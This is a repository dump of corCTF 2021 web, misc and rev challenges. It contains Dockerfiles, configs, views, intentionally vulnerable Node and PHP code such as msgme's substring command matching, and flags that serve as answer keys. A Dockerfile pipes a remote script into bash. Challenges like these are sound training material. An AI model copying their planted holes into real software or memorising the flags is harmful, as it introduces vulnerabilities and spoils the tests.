--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wN.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wN.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wP.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wQ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wQ.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wR.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/mp3/move.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/mp3/move.mp3


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3.9"
 2 | services:
 3 |   chall:
 4 |     build:
 5 |       context: ./chall
 6 |       dockerfile: Dockerfile
 7 |     ports:
 8 |       - '4000:80'
 9 |     environment:
10 |       - FLAG=corctf{"The opportunity of defeating the enemy is provided by the enemy himself." - Sun Tzu}
11 |       - STOCKFISHTIME=1.5
12 | 


--------------------------------------------------------------------------------
/corCTF-2021/rev/babyrev/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Baby
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | well uh...
 8 | this is what you get when you make your web guy make a rev chall
 9 | ```
10 | 
11 | Flag: `corctf{see?_rEv_aint_so_bad}`
12 | 


--------------------------------------------------------------------------------
/corCTF-2021/rev/babyrev/babyrev:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/rev/babyrev/babyrev


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Hard
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | Hey, check out this new blogging platform I made! If you're lucky, I might even post a flag...
 8 | 
 9 | NOTE: The admin bot will only follow URLs matching the following regex: 
10 | 
11 | `^https:\/\/blogme\.be\.ax\/post\/([0-9a-f-]+)$`
12 | ```
13 | 
14 | Flag: `corctf{ult1mate_x55_g0d!!!}`
15 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/.dockerignore:
--------------------------------------------------------------------------------
1 | .dockerignore
2 | Dockerfile


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:14-alpine
 2 | 
 3 | RUN mkdir -p /app
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | RUN chown node:node /app/
14 | 
15 | RUN chown node:node /app/uploads
16 | 
17 | USER node
18 | 
19 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "chall",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "bcrypt": "^5.0.1",
13 |     "busboy": "^0.3.1",
14 |     "csurf": "^1.11.0",
15 |     "dotenv": "^10.0.0",
16 |     "ejs": "^3.1.6",
17 |     "express": "^4.17.1",
18 |     "express-session": "^1.17.2",
19 |     "express-session-sequelize": "^2.3.0",
20 |     "node-fetch": "^2.6.1",
21 |     "sequelize": "^6.6.5",
22 |     "sqlite3": "^5.0.2"
23 |   }
24 | }
25 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/partials/footer.ejs:
--------------------------------------------------------------------------------
1 |     <script src="/assets/bootstrap/js/bootstrap.min.js"></script>
2 |     <script src="/assets/js/jquery.min.js"></script>
3 |     <script src="/assets/js/script.js"></script>
4 | </body>
5 | </html>


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/public/assets/css/styles.css:
--------------------------------------------------------------------------------
 1 | body, html {
 2 |     height: 100vh;
 3 | }
 4 | 
 5 | .avatar {
 6 |     height: 5rem;
 7 | }
 8 | 
 9 | .avatar-sm {
10 |     height: 2.5rem;
11 | }
12 | 
13 | .comment-author {
14 |     width: 25%;
15 | }
16 | 
17 | .post-text {
18 |     white-space: pre-line;
19 | }


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/public/assets/js/script.js:
--------------------------------------------------------------------------------
 1 | ! function(e) {
 2 |     "use strict";
 3 |     var t;
 4 |     t = () => {
 5 |         const t = e.querySelector(".dismiss"),
 6 |             s = e.querySelector(".sidebar"),
 7 |             c = e.querySelector(".overlay"),
 8 |             a = e.querySelector(".open-menu");
 9 |         s && (t.addEventListener("click", () => {
10 |             s.classList.remove("active"), c.classList.remove("active")
11 |         }), c.addEventListener("click", () => {
12 |             s.classList.remove("active"), c.classList.remove("active")
13 |         }), a.addEventListener("click", e => {
14 |             e.preventDefault(), s.classList.add("active"), c.classList.add("active")
15 |         }), e.querySelector(".nav-link").addEventListener("click", () => {
16 |             s.classList.remove("active"), c.classList.remove("active")
17 |         }))
18 |     }, "loading" != e.readyState ? t() : e.addEventListener("DOMContentLoaded", t)
19 | }(document);
20 | 
21 | window.onload = () => {
22 |     if(location.search)
23 |         history.replaceState({}, "", location.origin + location.pathname);
24 | };


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/src/util.js:
--------------------------------------------------------------------------------
1 | const requiresLogin = (req, res, next) => {
2 |     if(req.user)  {
3 |         return next();
4 |     }
5 |     res.redirect("/api/login?error=" + encodeURIComponent(`You must login to complete this action`));
6 | };
7 | 
8 | module.exports = { requiresLogin };


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/uploads/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/web/blogme/chall/uploads/.gitkeep


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/views/comment.ejs:
--------------------------------------------------------------------------------
 1 | <%- include('../partials/header.ejs'); %>
 2 |     <div class="container card bg-secondary mt-5 p-0">
 3 |         <div class="card-header"><h3 class="m-0">Comment</h3></div>
 4 |         <div class="card-body">
 5 |             <div class="card-text">Enter your comment below:</div>
 6 |             <form method="POST" action="/api/comment">
 7 |                 <input class="form-control" type="hidden" name="id" value="<%= id %>">
 8 |                 <div class="input-group mt-3">
 9 |                     <span class="input-group-text">Comment</span>
10 |                     <textarea class="form-control" name="text" rows=3 maxlength=150></textarea>
11 |                 </div>
12 |                 <input type="hidden" name="_csrf" value="<%= csrfToken %>">
13 |                 <button class="btn btn-primary mt-3 float-end" type="submit">Comment</button>
14 |             </form>
15 |         </div>
16 |     </div>
17 | <%- include('../partials/footer.ejs'); %>


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/views/login.ejs:
--------------------------------------------------------------------------------
 1 | <%- include('../partials/header.ejs'); %>
 2 |     <div class="container card bg-secondary mt-5 p-0">
 3 |         <div class="card-header"><h3 class="m-0">Login</h3></div>
 4 |         <div class="card-body">
 5 |             <form method="POST" action="/api/login">
 6 |                 <div class="input-group">
 7 |                     <span class="input-group-text">Username</span>
 8 |                     <input class="form-control" type="text" name="user">
 9 |                 </div>
10 |                 <div class="input-group mt-3">
11 |                     <span class="input-group-text">Password</span>
12 |                     <input class="form-control" type="password" name="pass">
13 |                 </div>
14 |                 <input type="hidden" name="_csrf" value="<%= csrfToken %>">
15 |                 <button class="btn btn-primary mt-3 float-end" type="submit">Login</button>
16 |             </form>
17 |         </div>
18 |     </div>
19 | <%- include('../partials/footer.ejs'); %>


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/views/register.ejs:
--------------------------------------------------------------------------------
 1 | <%- include('../partials/header.ejs'); %>
 2 |     <div class="container card bg-secondary mt-5 p-0">
 3 |         <div class="card-header"><h3 class="m-0">Register</h3></div>
 4 |         <div class="card-body">
 5 |             <form method="POST" action="/api/register">
 6 |                 <div class="input-group">
 7 |                     <span class="input-group-text">Username</span>
 8 |                     <input class="form-control" type="text" name="user">
 9 |                 </div>
10 |                 <div class="input-group mt-3">
11 |                     <span class="input-group-text">Password</span>
12 |                     <input class="form-control" type="password" name="pass">
13 |                 </div>
14 |                 <input type="hidden" name="_csrf" value="<%= csrfToken %>">
15 |                 <button class="btn btn-primary mt-3 float-end" type="submit">Register</button>
16 |             </form>
17 |         </div>
18 |     </div>
19 | <%- include('../partials/footer.ejs'); %>


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/chall/views/remove.ejs:
--------------------------------------------------------------------------------
 1 | <%- include('../partials/header.ejs'); %>
 2 |     <div class="container card bg-secondary mt-5 p-0">
 3 |         <div class="card-header"><h3 class="m-0">Delete <%= type %></h3></div>
 4 |         <div class="card-body">
 5 |             <div class="card-text">Are you sure you want to delete the <%= type %> with id <%= id %>? This action cannot be undone!</div>
 6 |             <form method="POST" action="/api/remove">
 7 |                 <input class="form-control" type="hidden" name="id" value="<%= id %>">
 8 |                 <input class="form-control" type="hidden" name="type" value="<%= type %>">
 9 |                 <input type="hidden" name="_csrf" value="<%= csrfToken %>">
10 |                 <button class="btn btn-danger mt-3 float-end" type="submit">Delete</button>
11 |             </form>
12 |         </div>
13 |     </div>
14 | <%- include('../partials/footer.ejs'); %>


--------------------------------------------------------------------------------
/corCTF-2021/web/blogme/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3.9"
 2 | services:
 3 |   chall:
 4 |     build:
 5 |       context: ./chall
 6 |       dockerfile: Dockerfile
 7 |     deploy:
 8 |       restart_policy:
 9 |         condition: any
10 |     ports:
11 |       - '80:80'
12 |     environment:
13 |       - ADMIN_PASS=REDACTED
14 |       - SESSION_SECRET=REDACTED


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Easy
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | I made a new site to buy flags! But no hoarding, okay :<
 8 | ```
 9 | 
10 | Flag: `corctf{h0w_did_u_steal_my_flags_you_flag_h0arder??!!}`
11 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/chall/.dockerignore:
--------------------------------------------------------------------------------
1 | .dockerignore
2 | Dockerfile


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:14-alpine
 2 | 
 3 | RUN mkdir -p /app
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | USER node
14 | 
15 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/chall/db.js:
--------------------------------------------------------------------------------
 1 | const fs = require("fs");
 2 | 
 3 | const flags = new Map();
 4 | for(let flag of JSON.parse(fs.readFileSync("flags.json")).flags) {
 5 |     if(flag.name === "corCTF") {
 6 |         flag.text = process.env.FLAG || "corctf{h0w_did_u_steal_my_flags_you_flag_h0arder??!!}";
 7 |     }
 8 |     flags.set(flag.name, flag);
 9 | }
10 | 
11 | const users = new Map();
12 | 
13 | const buyFlag = ({ flag, user }) => {
14 |     if(!flags.has(flag)) {
15 |         throw new Error("Unknown flag");
16 |     }
17 |     if(user.money < flags.get(flag).price) {
18 |         throw new Error("Not enough money");
19 |     }
20 | 
21 |     user.money -= flags.get(flag).price;
22 |     user.flags.push(flag);
23 |     users.set(user.user, user);
24 | };
25 | 
26 | module.exports = { flags, users, buyFlag };
27 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "buyme",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "bcrypt": "^5.0.1",
13 |     "cookie-parser": "^1.4.5",
14 |     "dotenv": "^10.0.0",
15 |     "express": "^4.17.1",
16 |     "hbs": "^4.1.2"
17 |   }
18 | }
19 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/chall/public/assets/css/styles.css:
--------------------------------------------------------------------------------
 1 | form > .input-group {
 2 |   margin: 1rem 0;
 3 | }
 4 | 
 5 | form > button {
 6 |   float: right;
 7 | }
 8 | 
 9 | .flag-image {
10 |   height: 10rem;
11 |   display: flex;
12 |   align-items: center;
13 |   justify-content: center;
14 | }
15 | .flag {
16 |   max-height: 10rem;
17 |   width: auto;
18 |   max-width: 100%;
19 | }
20 | 
21 | .flag-card {
22 |   padding: 1rem;
23 | }


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/chall/views/flags.hbs:
--------------------------------------------------------------------------------
 1 | <div class="container mt-3">
 2 |     {{#if user}}
 3 |     <br />
 4 |     <h3>money: {{user.money}}$</h3>
 5 |     <br />
 6 |     {{/if}}
 7 |     <div class="card-group">
 8 |         {{#each flags}}
 9 |         <div class="card flag-card">
10 |             <div class="flag-image">
11 |                 <img class="card-img-top flag" src="{{this.image}}" />
12 |             </div>
13 |             <div class="card-body">
14 |                 <h4 class="card-title">{{this.name}}</h4>
15 |                 <h5 class="card-title">Price: {{this.price}}$</h4>
16 |                 <br />
17 |                 <form method="POST" action="/api/buy">
18 |                     <input type="hidden" name="flag" value="{{this.name}}" />
19 |                     <button class="btn btn-primary float-end" type="submit">Buy</button>
20 |                 </form>
21 |             </div>
22 |         </div>
23 |         {{/each}}
24 |     </div>
25 |     <div class="d-flex justify-content-center mt-3">
26 |         <h3>more flags to be added soon™</h3>
27 |     </div>
28 | </div>


--------------------------------------------------------------------------------
/corCTF-2021/web/buyme/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3.9"
 2 | services:
 3 |   chall:
 4 |     build:
 5 |       context: ./chall
 6 |       dockerfile: Dockerfile
 7 |     deploy:
 8 |       restart_policy:
 9 |         condition: any
10 |     ports:
11 |       - '80:80'
12 |     environment:
13 |       - FLAG=REDACTED
14 |     read_only: true


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Insane
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | The easiest way to message people all around the world instantly. A new and improved totally secure chat program (and this one has source 😉)
 8 | 
 9 | NOTE: If your payload is working locally but not remotely, please contact us.
10 | 
11 | HINT: this messaging service is great! i know the site uses websockets, but have you heard of this new Real Time Communication technology the browser supports? (also GCP blocks some ports lol)
12 | ```
13 | 
14 | Flag: `corctf{csp_h0w_c0uld_you_do_th15_to_m333??}`
15 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/.dockerignore:
--------------------------------------------------------------------------------
1 | .dockerignore
2 | Dockerfile


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:14-alpine
 2 | 
 3 | RUN mkdir -p /app
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | USER node
14 | 
15 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "msgme",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "dotenv": "^10.0.0",
13 |     "express": "^4.17.1",
14 |     "express-session": "^1.17.2",
15 |     "express-ws": "^5.0.2",
16 |     "hbs": "^4.1.2",
17 |     "memorystore": "^1.6.6"
18 |   }
19 | }
20 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands.js:
--------------------------------------------------------------------------------
 1 | const fs = require('fs');
 2 | 
 3 | let cmdList = [
 4 |     "help",
 5 |     "roll",
 6 |     "secret",
 7 |     "8ball",
 8 |     "math",
 9 |     "coinflip",
10 |     "flag"
11 | ];
12 | let cmds = Object.create(null);
13 | 
14 | const init = () => {
15 |     for(let i = 0; i < cmdList.length; i++) {
16 |         let name = cmdList[i];
17 |         let cmd = require(`./commands/${name}.js`);
18 |         cmds[name] = cmd;
19 |     }
20 | }
21 | 
22 | const handle = (ws, data) => {
23 |     let args = data.msg.split(" ");
24 |     let cmd = args[0].slice(1);
25 |     data.msg = `${ws.user}: `;
26 | 
27 |     let found = false;
28 |     for(let name of Object.keys(cmds)) {
29 |         if(cmd.includes(name)) {
30 |             found = true;
31 |             cmds[name].run(ws, args, data);
32 |         }
33 |     }
34 | 
35 |     if(found) {
36 |         return data;
37 |     }
38 |     return false;
39 | };
40 | 
41 | module.exports = { cmds, init, handle };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands/8ball.js:
--------------------------------------------------------------------------------
 1 | const help = "Asks the mythical magic 8-ball a question";
 2 | const run = (ws, args, data) => {
 3 | 	let question = args.slice(1).join(" ");
 4 | 	if(!question.endsWith("?")) {
 5 | 		question += "?";
 6 | 	}
 7 | 	data.msg += question + " ";
 8 | 
 9 | 	let responses = ['It is certain', 'It is decidedly so', 'Without a doubt', 'Yes – definitely', 'You may rely on it', 'As I see it, yes', 'Most likely', 'Outlook good', 'Signs point to yes', 'Reply hazy', 'try again', 'Ask again later', 'Better not tell you now', 'Cannot predict now', 'Concentrate and ask again', 'Dont count on it', 'My reply is no', 'My sources say no', 'Outlook not so good', 'Very doubtful'];
10 | 	data.msg += responses[Math.floor(Math.random() * responses.length)];
11 | };
12 | 
13 | module.exports = { help, run };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands/coinflip.js:
--------------------------------------------------------------------------------
1 | const help = "Flips a coin";
2 | const run = (ws, args, data) => {
3 | 	data.msg += (Math.random() > 0.5 ? "Heads" : "Tails");
4 | };
5 | 
6 | module.exports = { help, run };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands/flag.js:
--------------------------------------------------------------------------------
 1 | const help = "...!";
 2 | 
 3 | const secret = require("../commands.js").cmds.secret.secret;
 4 | 
 5 | const run = (ws, args, data) => {
 6 | 	if(args[1] === secret) {
 7 | 		data.msg += process.env.FLAG;
 8 | 	}
 9 | 	else {
10 | 		data.msg += "Incorrect secret!";
11 | 	}
12 | };
13 | 
14 | module.exports = { help, run };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands/help.js:
--------------------------------------------------------------------------------
 1 | const commands = require("../commands.js");
 2 | 
 3 | const help = "Provides help for the command system.";
 4 | const run = (ws, args, data) => {
 5 | 	let target = args[1];
 6 | 	
 7 | 	if(!target) {
 8 | 		data.msg += "Commands: !" + Object.keys(commands.cmds).join(" !");
 9 | 		return;
10 | 	}
11 | 
12 | 	if(target.startsWith("!")) {
13 | 		target = target.slice(1);
14 | 	}
15 | 
16 | 	if(target && commands.cmds[target]) {
17 | 		data.msg += `!${target}: ${commands.cmds[target].help}`;
18 | 	}
19 | 	else {
20 | 		data.msg += `Command not found.`;
21 | 	}
22 | 
23 | 	return;
24 | };
25 | 
26 | module.exports = { help, run };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands/math.js:
--------------------------------------------------------------------------------
1 | const help = "2+2=4-1=3 quick maffs";
2 | const run = (ws, args, data) => {
3 | 	data.msg += args.slice(1).join(" ");
4 | 	data.type = "sandbox";
5 | };
6 | 
7 | module.exports = { help, run };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands/roll.js:
--------------------------------------------------------------------------------
 1 | const help = "Rolls a number";
 2 | const run = (ws, args, data) => {
 3 | 	let max = 100;
 4 | 	if(args[1] && !isNaN(args[1])) {
 5 | 		max = parseInt(args[1]);
 6 | 	}
 7 | 	data.msg += `You rolled: ${Math.floor(Math.random() * max + 1)}, ${ws.user}`;
 8 | };
 9 | 
10 | module.exports = { help, run };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/chall/src/commands/secret.js:
--------------------------------------------------------------------------------
 1 | const help = "...?";
 2 | 
 3 | const secret = require("crypto").randomBytes(64).toString("base64");
 4 | 
 5 | const run = (ws, args, data) => {
 6 | 	if(ws.admin && data.to === "admin") {
 7 | 		data.msg += secret;
 8 |         return;
 9 | 	}
10 | 	data.msg += "nope";
11 | };
12 | 
13 | module.exports = { help, run, secret };


--------------------------------------------------------------------------------
/corCTF-2021/web/msgme/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3.9"
 2 | services:
 3 |   chall:
 4 |     build:
 5 |       context: ./chall
 6 |       dockerfile: Dockerfile
 7 |     deploy:
 8 |       restart_policy:
 9 |         condition: any
10 |     ports:
11 |       - '80:80'
12 |     environment:
13 |       - SITE=https://msgme.be.ax
14 |       - FLAG=corctf{csp_h0w_c0uld_you_do_th15_to_m333??}
15 |       - ADMIN_PASSWORD=REDACTED
16 |       - SESSION_SECRET=REDACTED
17 |     read_only: true
18 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/phpme/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM alpine:latest
 2 | 
 3 | RUN adduser -D -u 1000 -g 1000 -s /bin/sh www
 4 | 
 5 | RUN apk add --no-cache --update php7-fpm php7-json supervisor nginx
 6 | 
 7 | COPY config/fpm.conf /etc/php7/php-fpm.d/www.conf
 8 | COPY config/supervisord.conf /etc/supervisord.conf
 9 | COPY config/nginx.conf /etc/nginx/nginx.conf
10 | 
11 | COPY challenge /www
12 | 
13 | RUN chown -R www:www /var/lib/nginx
14 | 
15 | EXPOSE 80
16 | 
17 | CMD /usr/bin/supervisord -c /etc/supervisord.conf


--------------------------------------------------------------------------------
/corCTF-2021/web/phpme/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Easy-Medium
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | "This is what normal PHP CTF challenges look like, right?" - A web dev who barely knows PHP
 8 | ```
 9 | 
10 | Flag: `corctf{ok_h0pe_y0u_enj0yed_the_1_php_ch4ll_1n_th1s_CTF!!!}`
11 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/phpme/challenge/secret.php:
--------------------------------------------------------------------------------
1 | <?php
2 |     $secret = "js1ZY13Y8sCZXVgeLKjp32AM8UfnBNnYGqGSKXXHOE76IWgywUXqjvILJzyIYLmo";
3 |     $flag = "corctf{ok_h0pe_y0u_enj0yed_the_1_php_ch4ll_1n_th1s_CTF!!!}";
4 | ?>


--------------------------------------------------------------------------------
/corCTF-2021/web/phpme/config/fpm.conf:
--------------------------------------------------------------------------------
 1 | [global]
 2 | daemonize = no
 3 | error_log = /dev/stderr
 4 | log_level = notice
 5 | 
 6 | [www]
 7 | user = www
 8 | group = www
 9 | 
10 | clear_env = On
11 | 
12 | listen = /run/php-fpm.sock
13 | listen.owner = www
14 | listen.group = www
15 | 
16 | pm = dynamic
17 | pm.max_children = 5
18 | pm.start_servers = 2
19 | pm.min_spare_servers = 1
20 | pm.max_spare_servers = 3


--------------------------------------------------------------------------------
/corCTF-2021/web/phpme/config/nginx.conf:
--------------------------------------------------------------------------------
 1 | user www;
 2 | pid /run/nginx.pid;
 3 | error_log /dev/stderr info;
 4 | 
 5 | events {
 6 |     worker_connections 1024;
 7 | }
 8 | 
 9 | http {
10 |     server_tokens off;
11 |     charset utf-8;
12 |     keepalive_timeout 20s;
13 |     sendfile on;
14 |     tcp_nopush on;
15 |     client_max_body_size 1M;
16 | 
17 |     include /etc/nginx/mime.types;
18 | 
19 |     server {
20 |         listen 80;
21 |         server_name _;
22 | 
23 |         index index.php;
24 |         root /www;
25 | 
26 |         location / {
27 |             try_files $uri $uri/ /index.php?$query_string;
28 |             location ~ \.php$ {
29 |                 try_files $uri =404;
30 |                 fastcgi_pass unix:/run/php-fpm.sock;
31 |                 fastcgi_index index.php;
32 |                 fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
33 |                 include fastcgi_params;
34 |             }
35 |         }
36 |     }
37 | }


--------------------------------------------------------------------------------
/corCTF-2021/web/phpme/config/supervisord.conf:
--------------------------------------------------------------------------------
 1 | [supervisord]
 2 | user=root
 3 | nodaemon=true
 4 | logfile=/dev/null
 5 | logfile_maxbytes=0
 6 | pidfile=/run/supervisord.pid
 7 | 
 8 | [program:fpm]
 9 | command=php-fpm7 -F
10 | autostart=true
11 | priority=1000
12 | stdout_logfile=/dev/stdout
13 | stdout_logfile_maxbytes=0
14 | stderr_logfile=/dev/stderr
15 | stderr_logfile_maxbytes=0
16 | 
17 | [program:nginx]
18 | command=nginx -g 'daemon off;'
19 | autostart=true
20 | stdout_logfile=/dev/stdout
21 | stdout_logfile_maxbytes=0
22 | stderr_logfile=/dev/stderr
23 | stderr_logfile_maxbytes=0


--------------------------------------------------------------------------------
/corCTF-2021/web/readme/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Medium
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | My new site readme is the ultimate tool for readers everywhere. Remove clutter from any site and also fetch the next chapters with the click of a button.
 8 | ```
 9 | 
10 | Flag: `corctf{but_wh3re_w1ll_i_r3ad_my_n0vels_now??????}`
11 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/readme/chall/.dockerignore:
--------------------------------------------------------------------------------
1 | node_modules
2 | Dockerfile
3 | .dockerignore


--------------------------------------------------------------------------------
/corCTF-2021/web/readme/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM node:14-alpine
 2 | 
 3 | RUN mkdir -p /app
 4 | 
 5 | WORKDIR /app
 6 | 
 7 | COPY package.json .
 8 | 
 9 | RUN npm install
10 | 
11 | COPY . .
12 | 
13 | USER node
14 | 
15 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/web/readme/chall/flag.txt:
--------------------------------------------------------------------------------
1 | corctf{but_wh3re_w1ll_i_r3ad_my_n0vels_now??????}
2 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/readme/chall/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "readme",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "@mozilla/readability": "^0.4.1",
13 |     "express": "^4.17.1",
14 |     "jsdom": "^16.5.0",
15 |     "node-fetch": "^2.6.1",
16 |     "socket.io": "^4.0.1"
17 |   }
18 | }
19 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/readme/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: "3.9"
 2 | services:
 3 |   chall:
 4 |     build:
 5 |       context: ./chall
 6 |       dockerfile: Dockerfile
 7 |     deploy:
 8 |       restart_policy:
 9 |         condition: any
10 |     ports:
11 |       - '80:80'
12 |     read_only: true


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Insane
 2 | 
 3 | Author: Strellic and ehhthing
 4 | 
 5 | Description:
 6 | ```
 7 | ssrf as a service (SaaS) — test out all your 𝓭𝓪𝓷𝓴 ssrf exploits here!!!
 8 | 
 9 | NOTE: This challenge uses per-team instances. Please test locally (this challenge works best with an Ubuntu host) and don't launch one until you have a working exploit.
10 | ```
11 | 
12 | Flag: `corctf{1_10v3_saas_and_a11_1t_stands_f0r}`
13 | 


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/.dockerignore:
--------------------------------------------------------------------------------
1 | node_modules/
2 | Dockerfile


--------------------------------------------------------------------------------
/corCTF-2021/web/saasme/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM ubuntu:latest
 2 | 
 3 | ENV DEBIAN_FRONTEND=noninteractive 
 4 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD=true
 5 | 
 6 | RUN apt-get update && apt-get install curl -y
 7 | RUN curl -fsSL https://deb.nodesource.com/setup_16.x | bash -
 8 | RUN apt-get install -y nodejs
 9 | 
10 | RUN apt-get update && apt-get install -y --no-install-recommends \
11 |   libglib2.0-0 libnss3 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 \
